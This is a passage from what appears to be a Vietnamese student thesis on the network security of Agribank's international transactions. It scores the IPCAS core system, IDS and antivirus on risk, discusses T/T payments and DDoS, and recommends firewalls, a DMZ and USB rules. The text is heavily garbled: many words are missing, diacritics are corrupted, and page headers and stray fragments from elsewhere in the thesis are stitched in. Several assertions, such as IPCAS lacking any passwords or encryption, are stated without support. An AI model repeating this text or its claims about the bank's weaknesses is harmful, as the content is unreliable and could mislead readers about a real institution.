ngân hàng nông nghiệp phát triển nông thôn Đánh giá: với số điểm đánh giá cuối 15,5 điểm cho giá trị an ninh, mức điểm đánh giá cao, với điểm tác giả cho sẵn cho thành phần nên giá trị đóng góp IDS nói cao nhiều so với mong đợi gần giá trị thực Một thành phần an ninh nằm trung tâm hệ thống có chức lưu trữ IPCAS thực có đáng giá đến hay khơng? Để hiểu IPCAS có điểm đánh gía cao thế, ta xem lại đánh giá Bị thâm nhập từ bên (x) Mất sở liệu (y) Không xác định người công (z) Bị vơ hiệu hố hệ thống (t) Mất quyền điều hành hệ thống (a) Bị dùng làm bình phong đợt công khác (i) Rủi ro từ người dùng mang lại (n) Có thể nói IPCAS chứa rủi ro toàn hệ thống, nguyên đơn giản: kho lưu trữ cuối tồn hệ thống chương trình đóng hồn tồn, điều đồng nghĩa với việc khơng có ổ khoá mật thành viên, thứ hai khơng có khu vực mã hố cả, thứ ba lưu trữ tất hệ thống (có mã nguồn web hay IDS), tất nhiên bao gồm hệ thống liên lạc với SWIFT, cuối khơng có ổ khố nên thành phần an ninh trước bị đánh phá thành cơng việc đánh quyền quản lý IPCAS hay thơng tin bị rị rỉ từ IPCAS hiển nhiên – tương ứng với mức thiệt hại 10,5 tức tất (bội số 0,5 giá trị biểu tượng thống IPCAS hay giá trị lòng tin thương hiệu Aribank) 5.3.5 Đánh giá tổng thể: Thơng qua phân tích IPCAS nắm số điểm cao toàn hệ thống có giá trị hệ thống, nhiên IPCAS vị vua khơng ngai, khơng có thành phần khác bảo vệ dễ dàng đánh báu Do thực tế ba thành phần cịn lại có giá trị thực cao nhất, antivirus lên giải pháp tức thời cho hành vi xâm nhập rà soát hệ thống IDS thất bại việc giám sát Trong giao dịch quốc tế thông qua mạng hàm D E phân tích gia tăng giá trị theo mức giao dịch quốc tế, độ phổ biến ngân hàng ngày gia tăng, từ giá trị hệ thống ngày trở nên béo bở với giới hacker nước Lúc với lượng rủi ro từ kaspersky ổn định giải pháp nâng cao an ninh đơn giản Do chương trình chống virus lớn có độ phủ gần toàn cầu nên khả ứng dụng chống lại virus kaspersky GVHD: Lê Phương Dung Trang 60 SVTH: Châu Trần Sơn Điền Đánh giá tính an tồn giao dịch quốc tế thơng qua mạng ngân hàng nông nghiệp phát triển nông thôn thử thách nơi, điều đồng nghĩa với việc hàm D E kaspersky gia tăng biên độ với độ mở rộng ngân hàng Ba yếu tố I (impact – mức thiệt hại bị công), S (simplycity – mức độ đơn giản áp dụng), P (popularity – mức phổ biến cách thức thực hiện) kaspersky hạn chế phần, mức thiệt hại hạn chế với chức tạo file ghost tách riêng với hệ thống để lưu trữ thông tin cần thiết (tuy nhiên có điểm yếu chiếm khơng gian hệ thống), mức độ đơn giản việc lập trình virus cực thấp, lập trình virus virus để vượt qua hệ thống kaspersky ln khó khăn chương trình có chức khoá hành vi nghi ngờ hay gây hại cho hệ thống từ ban đầu hay cảnh báo người dùng, mức phổ biến việc lập trình virus cao vơi hỗ trợ internet, để lập trình bậc cao bạn phải tự học sáng tạo cho yếu tố virus thành công độc hiệu chương trình antivirus dị virus diệt để đưa định gặp đoạn mã lạ chương trình 5.3.6 Thanh tốn T/T hệ thống an ninh mạng với rủi ro khai thác Thanh tốn T/T ngân hàng aribank loại toán thực thường xun ngân hàng, với hình thức tốn ngân hàng thường thực thông qua IPCAS Trong toán T/T giao dịch xác thực giao dịch thơng qua mã lệnh nhập máy tính Với hệ thống máy tính hệ thống, hoạt động đa phần đươc giám sát từ phịng điện tín, nhiên hệ thống IPCAS số khu vực phân vùng nhằm phân định rõ trách nhiệm với cơng việc Như q trình tốn hacker thơng qua cơng thăm dò cổng port hệ thống hay đơn giản dị dịng thơng tin vào hệ thống vơ tình nắm thông tin số tài khoản, ngày giao dịch, mặt hàng thơng tin khác Chúng khơng có giá trị với với số người khác chúng có giá trị định, điều thực tế hồn tồn xảy hệ thống IDS thực ứng biến chậm, đa phần hoạt động nghi ngờ chờ lệnh từ nhà quản trị Với DDOS hệ thống bị treo tạm thời dẫn đến giao dịch diễn hay gây ảnh hưởng đến thời gian giao dịch khách hàng, giao dịch T/T, có chậm trễ gây thiệt hại lớn Trong biện pháp thường dùng chống DDOS IDS chủ yếu chặn IP từ nguồn cơng, biện pháp phản tác dụng IP bị chặn khách hàng thường xuyên ( bị lộ IP hay bị kiểm sốt máy tính – với cơng ty máy tính nhân viên dễ bị thâm nhập hàng rào kiểm sốt an ninh mạng) ngân hàng bị khách hàng GVHD: Lê Phương Dung Trang 61 SVTH: Châu Trần Sơn Điền Đánh giá tính an tồn giao dịch quốc tế thơng qua mạng ngân hàng nông nghiệp phát triển nông thôn Ở tác giả khơng phân tích đến yếu tố firewall antivirus hay IPCAS với tốn T/T điện tín thơng tin chuyển tải thơng qua SWIFT, có nghĩa thơng tin hay điện tín thơng qua hệ thống mạng liên ngân hàng, tức đóng hồn tồn, khơng có liên hệ với bên trừ nhân viên xác lập, từ kẽ hở để hacker phá hoại hệ thống cực thấp, có dễ dàng truy người cơng, hacker dám làm CHƢƠNG 6: KẾT LUẬN VÀ KIẾN NGHỊ 6.1 Kết luận: Với hệ thống lớn Aribank, việc bảo vệ thông tin đơn giản, với trợ giúp thành phần an ninh tại, nói Aribank hồn thành đươc nhiệm vụ ngân hàng thông tin khách hàng thơng tin Các thành phần hệ thống có mức điểm chênh lệch khác nhiên xét hệ thống thực thành phần thiếu, mà tuỳ thuộc vào mức đánh ta có biện pháp nâng cao khác Trong thời đại công nghệ thông tin bạn không công nhận phát triển internet Cùng với internet, an ninh mạng dần quan tâm giới quản trị mạng với chức bảo mật liệu thông tin quan trọng, nhiên bên cạnh gia tăng hacker coi thường, việc phòng chống hacker mối đe doạ mạng internet ngày trở nên cần thiết Để bảo vệ, cần có hiểu biết công cụ hack phương pháp hacker Qua nhìn tổng quan an ninh mạng hệ thống Aribank giúp có biện pháp để đề phịng cc cơng bảo vệ sở liệu 6.2 Kiến nghị Xét mặt tổng thể toàn hệ thống nói hệ thống an ninh mạng Aribank có mức điểm tối đa 10 10, thành phần phụ trợ lẫn giai đoạn công việc, chia chúng thành đối tượng riêng lẻ phát sinh vấn đề xảy rủi ro Từ rủi ro đưa phần phân tích tác giả xin đưa số giải pháp cho toàn hệ thống: Bị thâm nhập từ bên ngoài, không xác định người công: nâng cấp tường lửa loại tường lửa thiết bị (không phải loại tường lửa chương trình cài đặt máy tính) với mức độ bảo mật cao dể kiểm soát người dùng vào hệ thống Bị vơ hiệu hố hệ thống, bị dùng làm bình phong đợt công khác, quyền điều hành hệ thống, bị dùng làm nội gián đợt công khác, sở liệu: cần nâng cấp hệ thống với vùng DMZ riêng biệt (vùng DMZ có nghĩa vùng tách riêng với hệ thống, nói cách khác vùng phi qn khơng có chương trình phép thâm nhập hay cài vào nó, có khái niệm lưu trữ chuyển – lấy ra, tức lưu lại, trừ nhà quản trị muốn xố đi) để bảo mật thơng tin cần lưu trữ đặc biệt GVHD: Lê Phương Dung Trang 62 SVTH: Châu Trần Sơn Điền Đánh giá tính an tồn giao dịch quốc tế thơng qua mạng ngân hàng nông nghiệp phát triển nông thôn gia tăng tính bảo mật cho hệ thống khả khơi phục lai hệ thống nhanh chóng bị công Tấn công DDOS vào hệ thống, lộ Ping điểm yếu cổng vào hệ thống, bị thăm dò thường xuyên: nâng cấp hệ thống IDS với chức tự xử lý có hành vi bất thường có khả phân loại hành động xâm nhập với hành động người dùng, việc phân vùng đối tượng cần thiết Rủi ro từ người dùng mang lại: vấn đề thật khơng lớn, tồn nhân ngân hàng có trách nhiệm nghĩa vụ phải bảo mật thơng tin, nhiên có sơ suất nhỏ công việc hay máy tính cá nhân mang vao gây ra, nên có quy chế định hoạt động liên quan hay gián tiếp gây hại đến hệ thống sử dụng usb nào, máy tính cá nhân nên cách ly với máy tính nội mạng dây dẫn nội Việc phân vùng IPCAS có chức tương tự nên mã hoá số tài liệu hay mã nguồn quan trọng GVHD: Lê Phương Dung Trang 63 SVTH: Châu Trần Sơn Điền Đánh giá tính an tồn giao dịch quốc tế thông qua mạng ngân hàng nông nghiệp phát triển nông thôn PHỤ LỤC  Tài liệu tham khảo: (1) - Không tác giả.05.01.2011.[Trực tuyến].CERT-US.Đọc từ.http://www.us-cert.gov/related-resources/ (2) - Toyota.20.11.2010 Athena:an ninh mạng ?.[Trực tuyến].Đọc từ http://forum.athena.edu.vn/tuyen-dung-viec-lam-sinh-vienthuc-tap/2850-athena-ninh-mang-la-gi.html (3) - Phạm Công Khiên, Lê Thị Hải Yến, Trần Bảo Quốc, Đoàn Đắc Dũng.18.03.2012 Trường Đại Học Mỏ Địa chất.Đọc từ “Bài tập lớn mơn mạng máy tính” (4) – không tác giả.không ngày tháng.[Trực tuyến].Wikipedia Đọc từ http://vi.wikipedia.org/wiki/Thanh_to%C3%A1n_qu%E1%BB%91c_t%E 1%BA%BF (5) – không tác giả.06.03.2013 VBARD.Đọc từ Dự án đại hoá toán kế toán khách hàng IPCAS (6) - Nguyễn Thiện Luận, Trần Hồng Quang.20.01.2013.Đai học quốc gia Hà Nội.Đọc từ Tap chí khoa học DHQGHN (174-180) (7) – Không tác giả.không ngày tháng.[Trực tuyến].Aribank.Đọc từ http://www.agribank.com.vn/101/782/gioi-thieu/thong-tin-chung.aspx (8) – Không tác giả.06.03.2013.Aribank.Đọc từ Tổng quan 2008 (9) – Erik Rodriguez 16/07/2004.[Trực tuyến].Đọc từ http://www.skullbox.net/ids.php (10) – Thuan soldier.31/03/2011.[Trực tuyến].Đọc từ http://thuansoldier.net/?attachment_id=669 (11) – Hhuynh.14/04/2012.[Trực tuyến].Đọc từ http://phatgiaohoahaohaingoai.com/showthread.php?t=516 (12) – Admin.không ngày tháng.[Trực tuyến].Đọc từ http://d07vt2ptit.forumn.org/t127-topic (13) - Tocbatdat không ngày tháng.[Trực tuyến].Vnexpert.Đọc từ http://vnexperts.net/bai-viet-ky-thuat/security/666-scan-port-toan-tp.html (14) – Admin.17/07/2006.[Trực tuyến].Đọc từ http://vnpro.org/forum/archive/index.php/t-9353.html (15) – T Thu.17/08/2006.[Trực tuyến].Đọc từ http://www.quantrimang.com.vn/baomat/hacker/31324_Cach-viet-motTrojan-don-gian-trong-VB6.aspx GVHD: Lê Phương Dung Trang 64 SVTH: Châu Trần Sơn Điền ... thơng qua mạng ngân hàng nông nghiệp phát triển nông thôn GVHD: Lê Phương Dung Trang 16 SVTH: Châu Trần Sơn Điền Đánh giá tính an tồn giao dịch quốc tế thông qua mạng ngân hàng nông nghiệp phát triển. .. Điền Đánh giá tính an tồn giao dịch quốc tế thông qua mạng ngân hàng nông nghiệp phát triển nông thôn GVHD: Lê Phương Dung Trang 24 SVTH: Châu Trần Sơn Điền Đánh giá tính an tồn giao dịch quốc tế. .. Điền Đánh giá tính an tồn giao dịch quốc tế thông qua mạng ngân hàng nông nghiệp phát triển nông thôn CHƢƠNG 4: GIỚI THIỆU VỀ CÔNG TY 4.1 Giới thiệu ngân hàng nông nghiệp phát triển nông thôn